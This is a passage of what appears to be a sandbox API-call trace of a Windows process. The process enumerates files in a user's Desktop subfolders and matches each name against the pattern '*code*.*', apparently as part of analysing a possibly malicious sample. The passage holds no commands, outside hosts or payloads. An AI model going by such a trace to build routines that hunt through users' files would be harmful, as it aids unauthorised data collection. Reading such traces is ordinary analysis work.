returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*" [0110.940] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743320 [0110.940] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.940] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.940] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\." [0110.940] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.940] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.940] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\.") returned="\\KTOu\\_5VgSE0-6jvrM\\." [0110.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.940] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.940] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.940] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.940] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.." [0110.940] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.940] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.940] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\..") returned="\\KTOu\\_5VgSE0-6jvrM\\.." [0110.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.940] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bd380, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0x1a731140, ftLastAccessTime.dwHighDateTime=0x1d7ad95, ftLastWriteTime.dwLowDateTime=0x1a731140, ftLastWriteTime.dwHighDateTime=0x1d7ad95, nFileSizeHigh=0x0, nFileSizeLow=0xa5ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="aQrMbJ6CFhwhf7PNnuMu.docx", cAlternateFileName="AQRMBJ~1.DOC")) returned 1 [0110.940] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.940] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.940] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.940] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.940] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.940] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.940] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04a0 [0110.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0110.941] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4c) returned 0x38eadc0 [0110.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x38eadc0, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", lpUsedDefaultChar=0x0) returned 76 [0110.941] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38ea9a0 [0110.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.941] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970e40 [0110.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970e40, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.941] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.941] PathMatchSpecW (pszFile="aQrMbJ6CFhwhf7PNnuMu.docx", pszSpec="*code*.*") returned 0 [0110.941] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2615710, ftCreationTime.dwHighDateTime=0x1d7aff0, ftLastAccessTime.dwLowDateTime=0xec0a4a10, ftLastAccessTime.dwHighDateTime=0x1d7aff3, ftLastWriteTime.dwLowDateTime=0xec0a4a10, ftLastWriteTime.dwHighDateTime=0x1d7aff3, nFileSizeHigh=0x0, nFileSizeLow=0x155c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ge40CUtwTNBApkxPnR.png", cAlternateFileName="GE40CU~1.PNG")) returned 1 [0110.941] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.941] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.941] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.941] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.941] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.941] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.941] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04a0 [0110.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0110.941] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x49) returned 0x38eabb0 [0110.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x38eabb0, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", lpUsedDefaultChar=0x0) returned 73 [0110.941] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eb080 [0110.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.942] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d40 [0110.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970d40, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.942] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.942] PathMatchSpecW (pszFile="ge40CUtwTNBApkxPnR.png", pszSpec="*code*.*") returned 0 [0110.942] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b17880, ftCreationTime.dwHighDateTime=0x1d7ad02, ftLastAccessTime.dwLowDateTime=0xd0a9b460, ftLastAccessTime.dwHighDateTime=0x1d7ae48, ftLastWriteTime.dwLowDateTime=0xd0a9b460, ftLastWriteTime.dwHighDateTime=0x1d7ae48, nFileSizeHigh=0x0, nFileSizeLow=0x8a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QXzQAUh0jIi.bmp", cAlternateFileName="QXZQAU~1.BMP")) returned 1 [0110.942] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.942] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.942] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.942] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.942] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.942] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.942] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a04a0 [0110.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0110.942] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x42) returned 0x39700d0 [0110.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x39700d0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", lpUsedDefaultChar=0x0) returned 66 [0110.942] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaf20 [0110.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.942] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d00 [0110.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970d00, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.942] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.942] PathMatchSpecW (pszFile="QXzQAUh0jIi.bmp", pszSpec="*code*.*") returned 0 [0110.942] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 1 [0110.942] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0110.942] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a29c0 [0110.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x29a29c0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", lpUsedDefaultChar=0x0) returned 63 [0110.943] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d20 [0110.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.943] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970be0 [0110.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970be0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.943] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.943] PathMatchSpecW (pszFile="YzBjdPQG.jpg", pszSpec="*code*.*") returned 0 [0110.943] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 0 [0110.943] FindClose (in: hFindFile=0x743320 | out: hFindFile=0x743320) returned 1 [0110.943] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.943] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea918 [0110.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x38ea918, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpUsedDefaultChar=0x0) returned 50 [0110.943] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0110.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.943] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970b80 [0110.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970b80, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.944] PathMatchSpecW (pszFile="_5VgSE0-6jvrM", pszSpec="*code*.*") returned 0 [0110.944] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 0 [0110.944] FindClose (in: hFindFile=0x7434e0 | out: hFindFile=0x7434e0) returned 1 [0110.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaa50 [0110.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x24) returned 0x29a3258 [0110.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x29a3258, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpUsedDefaultChar=0x0) returned 36 [0110.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970da0 [0110.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970da0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.944] PathMatchSpecW (pszFile="KTOu", pszSpec="*code*.*") returned 0 [0110.944] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59203b50, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0x89c45de0, ftLastAccessTime.dwHighDateTime=0x1d7aeaa, ftLastWriteTime.dwLowDateTime=0x89c45de0, ftLastWriteTime.dwHighDateTime=0x1d7aeaa, nFileSizeHigh=0x0, nFileSizeLow=0xac61, dwReserved0=0x0, dwReserved1=0x0, cFileName="LyMn8DqKE.jpg", cAlternateFileName="LYMN8D~1.JPG")) returned 1 [0110.944] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 